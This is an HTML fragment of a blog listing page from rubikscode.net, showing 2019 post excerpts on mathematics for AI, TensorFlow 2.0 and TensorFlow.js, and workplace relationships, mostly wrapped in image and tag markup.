https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/05/Calculus.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/05/Calculus.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9275" data-permalink="https://rubikscode.net/2019/05/13/mathematics-for-artificial-intelligence-calculus-optimization/calculus/" data-orig-file="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/05/Calculus.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Calculus" data-image-description="" data-medium-file="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/05/Calculus.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i0.wp.com/rubikscode.net/wp-content/uploads/2019/05/Calculus.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>If you followed previous blog posts on this site, you noticed that we covered a range of math topics that you should know in order to understand concepts behind machine learning, deep learning and artificial intelligence. So far, we went&#x2026; <div class="more-link-container"><a href="https://rubikscode.net/2019/05/13/mathematics-for-artificial-intelligence-calculus-optimization/" class="more-link">Read More <span class="screen-reader-text">Mathematics for Artificial Intelligence – Calculus &#038; Optimization</span></a></div></p> </div><!-- .entry-content --> </article><!-- #post-## --> <article id="post-9212" class="post-9212 post type-post status-publish format-standard has-post-thumbnail hentry category-ai category-machine-learning tag-ai tag-artificaial-inteligance tag-artificial-intelligence tag-artificial-neural-networks tag-deep-learning tag-machine-learning tag-math tag-mathematics tag-neural-networks tag-probability tag-software-craft tag-software-craftsmanship tag-software-development"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/05/06/mathematics-for-artificial-intelligence-probability/"><span class="day" aria-hidden="true">06</span><span class="month" aria-hidden="true">May</span><time class="screen-reader-text" datetime="2019-05-06T08:30:13+02:00">May 6, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/05/06/mathematics-for-artificial-intelligence-probability/#comments">2<span class="screen-reader-text"> comments on &ldquo;Mathematics for Artificial Intelligence – Probability&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/05/06/mathematics-for-artificial-intelligence-probability/" rel="bookmark">Mathematics for Artificial Intelligence – Probability</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/ai/" rel="category tag">AI</a>, <a href="https://rubikscode.net/category/machine-learning/" rel="category tag">Machine Learning</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/05/06/mathematics-for-artificial-intelligence-probability/" class="thumb-link"> <img width="760" height="300" src="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/Linear-Algebra-1.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/Linear-Algebra-1.png?resize=760%2C300&amp;ssl=1 760w, https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/Linear-Algebra-1.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/Linear-Algebra-1.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9236" data-permalink="https://rubikscode.net/2019/05/06/mathematics-for-artificial-intelligence-probability/linear-algebra-1/" data-orig-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/Linear-Algebra-1.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Linear Algebra (1)" data-image-description="" data-medium-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/Linear-Algebra-1.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/05/Linear-Algebra-1.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>Getting into machine learning, deep learning and artificial intelligence is not easy. These are all very cool and interesting topics, and they are being hyped lately, but like with software development, it is not for everybody. Some would say that&#x2026; <div class="more-link-container"><a href="https://rubikscode.net/2019/05/06/mathematics-for-artificial-intelligence-probability/" class="more-link">Read More <span class="screen-reader-text">Mathematics for Artificial Intelligence – Probability</span></a></div></p> </div><!-- .entry-content --> </article><!-- #post-## --> <article id="post-9177" class="post-9177 post type-post status-publish format-standard has-post-thumbnail hentry category-uncategorized"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/04/29/mathematics-for-artificial-intelligence-linear-algebra/"><span class="day" aria-hidden="true">29</span><span class="month" aria-hidden="true">Apr</span><time class="screen-reader-text" datetime="2019-04-29T08:30:18+02:00">April 29, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/04/29/mathematics-for-artificial-intelligence-linear-algebra/#comments">3<span class="screen-reader-text"> comments on &ldquo;Mathematics for Artificial Intelligence &#8211; Linear Algebra&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/04/29/mathematics-for-artificial-intelligence-linear-algebra/" rel="bookmark">Mathematics for Artificial Intelligence &#8211; Linear Algebra</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/uncategorized/" rel="category tag">Uncategorized</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/04/29/mathematics-for-artificial-intelligence-linear-algebra/" class="thumb-link"> <img width="760" height="300" src="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Linear-Algebra.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Linear-Algebra.png?resize=760%2C300&amp;ssl=1 760w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Linear-Algebra.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Linear-Algebra.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9203" data-permalink="https://rubikscode.net/2019/04/29/mathematics-for-artificial-intelligence-linear-algebra/linear-algebra/" data-orig-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Linear-Algebra.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Linear Algebra" data-image-description="" data-medium-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Linear-Algebra.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Linear-Algebra.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>Machine Learning, Neural Networks and Artificial intelligence are big buzzwords of the decade. It is not surprising that today these fields are expanding pretty quickly and are used to solve a vast amount of problems. We are witnesses of the&#x2026; <div class="more-link-container"><a href="https://rubikscode.net/2019/04/29/mathematics-for-artificial-intelligence-linear-algebra/" class="more-link">Read More <span class="screen-reader-text">Mathematics for Artificial Intelligence &#8211; Linear Algebra</span></a></div></p> </div><!-- .entry-content --> </article><!-- #post-## --> <article id="post-9114" class="post-9114 post type-post status-publish format-standard has-post-thumbnail hentry category-ai category-machine-learning category-python tag-ai tag-artificaial-inteligance tag-artificial-intelligence tag-artificial-neural-networks tag-data-science tag-datascience tag-deep-learning tag-machine-learning tag-python tag-software tag-software-craft tag-software-craftsmanship tag-software-development tag-tensorflow tag-tensorflow-2-0 tag-tf tag-tf-2-0"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/04/22/ultimate-guide-to-tensorflow-2-0-in-python/"><span class="day" aria-hidden="true">22</span><span class="month" aria-hidden="true">Apr</span><time class="screen-reader-text" datetime="2019-04-22T08:30:02+02:00">April 22, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/04/22/ultimate-guide-to-tensorflow-2-0-in-python/#comments">11<span class="screen-reader-text"> comments on &ldquo;Ultimate Guide to TensorFlow 2.0 in Python&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/04/22/ultimate-guide-to-tensorflow-2-0-in-python/" rel="bookmark">Ultimate Guide to TensorFlow 2.0 in Python</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/ai/" rel="category tag">AI</a>, <a href="https://rubikscode.net/category/machine-learning/" rel="category tag">Machine Learning</a>, <a href="https://rubikscode.net/category/python/" rel="category tag">Python</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/04/22/ultimate-guide-to-tensorflow-2-0-in-python/" class="thumb-link"> <img width="760" height="300" src="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/Copy-of-Tensorflow-js-series.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/Copy-of-Tensorflow-js-series.png?resize=760%2C300&amp;ssl=1 760w, https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/Copy-of-Tensorflow-js-series.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/Copy-of-Tensorflow-js-series.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9166" data-permalink="https://rubikscode.net/2019/04/22/ultimate-guide-to-tensorflow-2-0-in-python/copy-of-tensorflow-js-series/" data-orig-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/Copy-of-Tensorflow-js-series.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Copy of Tensorflow js series" data-image-description="" data-medium-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/Copy-of-Tensorflow-js-series.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/Copy-of-Tensorflow-js-series.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>Code that accompanies this article can be downloaded here. Last November TensorFlow celebrated its third birthday. Over the years it became one of the most loved ML frameworks and gathered a massive amount of followers. Google has done a great&#x2026; <div class="more-link-container"><a href="https://rubikscode.net/2019/04/22/ultimate-guide-to-tensorflow-2-0-in-python/" class="more-link">Read More <span class="screen-reader-text">Ultimate Guide to TensorFlow 2.0 in Python</span></a></div></p> </div><!-- .entry-content --> </article><!-- #post-## --> <article id="post-9132" class="post-9132 post type-post status-publish format-standard has-post-thumbnail hentry category-guest-post category-professionalism tag-leadership tag-profesoionalism tag-project-management tag-project-manager tag-software tag-software-craft tag-software-craftsmanship tag-software-development tag-software-development-leadership tag-teamlead"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/04/16/5-things-which-can-make-or-break-a-work-relationship/"><span class="day" aria-hidden="true">16</span><span class="month" aria-hidden="true">Apr</span><time class="screen-reader-text" datetime="2019-04-16T08:31:35+02:00">April 16, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/04/16/5-things-which-can-make-or-break-a-work-relationship/#respond">0<span class="screen-reader-text"> comments on &ldquo;5 Things Which Can Make (or Break) a Work Relationship&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/04/16/5-things-which-can-make-or-break-a-work-relationship/" rel="bookmark">5 Things Which Can Make (or Break) a Work Relationship</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/guest-post/" rel="category tag">Guest Post</a>, <a href="https://rubikscode.net/category/professionalism/" rel="category tag">Professionalism</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/04/16/5-things-which-can-make-or-break-a-work-relationship/" class="thumb-link"> <img width="760" height="300" src="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/make-or-brake-1.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/make-or-brake-1.png?resize=760%2C300&amp;ssl=1 760w, https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/make-or-brake-1.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/make-or-brake-1.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9149" data-permalink="https://rubikscode.net/2019/04/16/5-things-which-can-make-or-break-a-work-relationship/make-or-brake-2/" data-orig-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/make-or-brake-1.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="make or brake" data-image-description="" data-medium-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/make-or-brake-1.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i1.wp.com/rubikscode.net/wp-content/uploads/2019/04/make-or-brake-1.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>Coming home from a stressful day at the office got me thinking about how tough working relationships can be. All relationships are complex because humans are inherently complex, but professional ones are super tricky. We can’t always choose who we&#x2026; <div class="more-link-container"><a href="https://rubikscode.net/2019/04/16/5-things-which-can-make-or-break-a-work-relationship/" class="more-link">Read More <span class="screen-reader-text">5 Things Which Can Make (or Break) a Work Relationship</span></a></div></p> </div><!-- .entry-content --> </article><!-- #post-## --> <article id="post-9125" class="post-9125 post type-post status-publish format-standard has-post-thumbnail hentry category-ai category-javascript category-machine-learning tag-ai tag-artificaial-inteligance tag-artificial-intelligence tag-artificial-neural-networks tag-data-science tag-datascience tag-deep-learning tag-java-script tag-javascript tag-machine-learning tag-neural-networks tag-software tag-software-craft tag-software-craftsmanship tag-software-development tag-tensorflow tag-tensorflowjs"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/04/08/machine-learning-with-javascript-and-tensorflow-js-series/"><span class="day" aria-hidden="true">08</span><span class="month" aria-hidden="true">Apr</span><time class="screen-reader-text" datetime="2019-04-08T08:30:42+02:00">April 8, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/04/08/machine-learning-with-javascript-and-tensorflow-js-series/#respond">0<span class="screen-reader-text"> comments on &ldquo;Machine Learning with JavaScript and TensorFlow.js Series&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/04/08/machine-learning-with-javascript-and-tensorflow-js-series/" rel="bookmark">Machine Learning with JavaScript and TensorFlow.js Series</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/ai/" rel="category tag">AI</a>, <a href="https://rubikscode.net/category/javascript/" rel="category tag">JavaScript</a>, <a href="https://rubikscode.net/category/machine-learning/" rel="category tag">Machine Learning</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/04/08/machine-learning-with-javascript-and-tensorflow-js-series/" class="thumb-link"> <img width="760" height="300" src="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Tensorflow-js-series.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Tensorflow-js-series.png?resize=760%2C300&amp;ssl=1 760w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Tensorflow-js-series.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Tensorflow-js-series.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9127" data-permalink="https://rubikscode.net/2019/04/08/machine-learning-with-javascript-and-tensorflow-js-series/tensorflow-js-series/" data-orig-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Tensorflow-js-series.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Tensorflow js series" data-image-description="" data-medium-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Tensorflow-js-series.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/04/Tensorflow-js-series.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>Open-source library TensorFlow.js was introduced about a year ago. However, I didn’t manage to try it out up until now. The idea is to use possibilities of TensorFlow.jsto build and run our machine learning and deep learning modes in a browser or under Node.js.</p> </div><!-- .entry-content --> </article><!-- #post-## --> <article id="post-9089" class="post-9089 post type-post status-publish format-standard has-post-thumbnail hentry category-ai category-javascript category-machine-learning tag-ai tag-artificaial-inteligance tag-artificial-neural-networks tag-datascience tag-deep-learning tag-java-script tag-javascript tag-machine-learning tag-neural-networks tag-speech-recognition tag-tensorflow tag-tensorflowjs"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/04/01/drawing-with-voice-speech-recognition-with-tensorflow-js/"><span class="day" aria-hidden="true">01</span><span class="month" aria-hidden="true">Apr</span><time class="screen-reader-text" datetime="2019-04-01T08:30:42+02:00">April 1, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/04/01/drawing-with-voice-speech-recognition-with-tensorflow-js/#comments">1<span class="screen-reader-text"> comment on &ldquo;Drawing with Voice &#8211; Speech Recognition with TensorFlow.js&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/04/01/drawing-with-voice-speech-recognition-with-tensorflow-js/" rel="bookmark">Drawing with Voice &#8211; Speech Recognition with TensorFlow.js</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/ai/" rel="category tag">AI</a>, <a href="https://rubikscode.net/category/javascript/" rel="category tag">JavaScript</a>, <a href="https://rubikscode.net/category/machine-learning/" rel="category tag">Machine Learning</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/04/01/drawing-with-voice-speech-recognition-with-tensorflow-js/" class="thumb-link"> <img width="760" height="300" src="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-sr.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-sr.png?resize=760%2C300&amp;ssl=1 760w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-sr.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-sr.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9098" data-permalink="https://rubikscode.net/2019/04/01/drawing-with-voice-speech-recognition-with-tensorflow-js/tensorflow-js-sr/" data-orig-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-sr.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Tensorflow js sr" data-image-description="" data-medium-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-sr.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-sr.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>When I was a kid every almost every superhero had a voice-controlled computer. So you can imagine how my first encounter with Alexa was a profound experience for me. The kid in me was so happy and excited. Of course, then my engineering instincts kicked in and I analyzed how these devices work. Turned out they have neural networks that handle this complicated problem.</p> </div><!-- .entry-content --> </article><!-- #post-## --> <article id="post-9064" class="post-9064 post type-post status-publish format-standard has-post-thumbnail hentry category-ai category-javascript category-machine-learning tag-ai tag-artificaial-inteligance tag-artificial-neural-networks tag-convolutional-neural-networks tag-data-science tag-datascience tag-deep-learning tag-javascript tag-machine-learning tag-neural-networks tag-software tag-software-craftsmanship tag-software-development tag-tensorflow tag-tensorflowjs"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/03/25/image-classification-with-tensorflow-js/"><span class="day" aria-hidden="true">25</span><span class="month" aria-hidden="true">Mar</span><time class="screen-reader-text" datetime="2019-03-25T08:30:01+02:00">March 25, 2019</time></a></div><span class="comments-link"><a href="https://rubikscode.net/2019/03/25/image-classification-with-tensorflow-js/#comments">1<span class="screen-reader-text"> comment on &ldquo;Image Classification With TensorFlow.js&rdquo;</span></a></span><!-- .comments-link --> </div><!-- .entry-date --> <header class="entry-header"> <h2 class="entry-title"><a href="https://rubikscode.net/2019/03/25/image-classification-with-tensorflow-js/" rel="bookmark">Image Classification With TensorFlow.js</a></h2> <div class="entry-meta"> <span class="byline"> Posted by <span class="author vcard"><a class="url fn n" href="https://rubikscode.net/author/rubikscode/">rubikscode</a></span></span><span class="cat-links"> in <a href="https://rubikscode.net/category/ai/" rel="category tag">AI</a>, <a href="https://rubikscode.net/category/javascript/" rel="category tag">JavaScript</a>, <a href="https://rubikscode.net/category/machine-learning/" rel="category tag">Machine Learning</a></span> </div><!-- .entry-meta --> <div class="entry-thumb"> <a href="https://rubikscode.net/2019/03/25/image-classification-with-tensorflow-js/" class="thumb-link"> <img width="760" height="300" src="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-cnn.png?resize=760%2C300&amp;ssl=1" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="" srcset="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-cnn.png?resize=760%2C300&amp;ssl=1 760w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-cnn.png?zoom=2&amp;resize=760%2C300&amp;ssl=1 1520w, https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-cnn.png?zoom=3&amp;resize=760%2C300&amp;ssl=1 2280w" sizes="(max-width: 760px) 100vw, 760px" data-attachment-id="9078" data-permalink="https://rubikscode.net/2019/03/25/image-classification-with-tensorflow-js/tensorflow-js-cnn/" data-orig-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-cnn.png?fit=3400%2C1480&amp;ssl=1" data-orig-size="3400,1480" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="Tensorflow js cnn" data-image-description="" data-medium-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-cnn.png?fit=300%2C131&amp;ssl=1" data-large-file="https://i2.wp.com/rubikscode.net/wp-content/uploads/2019/03/Tensorflow-js-cnn.png?fit=720%2C314&amp;ssl=1" /> </a><!-- .thumb-link --> </div><!-- .entry-thumb --> </header><!-- .entry-header --> <div class="entry-content"> <p>The code that accompanies this article can be downloaded here. A couple of days ago news about AI that could detect shoplifters even before they commit the crime surfaced on the web. Not long after that, we could read about the&#x2026; <div class="more-link-container"><a href="https://rubikscode.net/2019/03/25/image-classification-with-tensorflow-js/" class="more-link">Read More <span class="screen-reader-text">Image Classification With TensorFlow.js</span></a></div></p> </div><!-- .entry-content --> </article><!-- #post-## --> <article id="post-9039" class="post-9039 post type-post status-publish format-standard has-post-thumbnail hentry category-ai category-javascript category-machine-learning tag-ai tag-artificaial-inteligance tag-artificial-intelligence tag-artificial-neural-networks tag-datascience tag-deep-learning tag-javascript tag-machine-learning tag-software tag-software-craftsmanship tag-software-development tag-tensorflow tag-tensorflowjs"> <div class="entry-secondary-meta"> <div class="post-date posted-on"><a href="https://rubikscode.net/2019/03/18/introduction-to-tensorflow-js-with-real-world-example/"><span class="day" aria-hidden="true">18</span><span class="month" aria-hidden="true">Mar</span><time 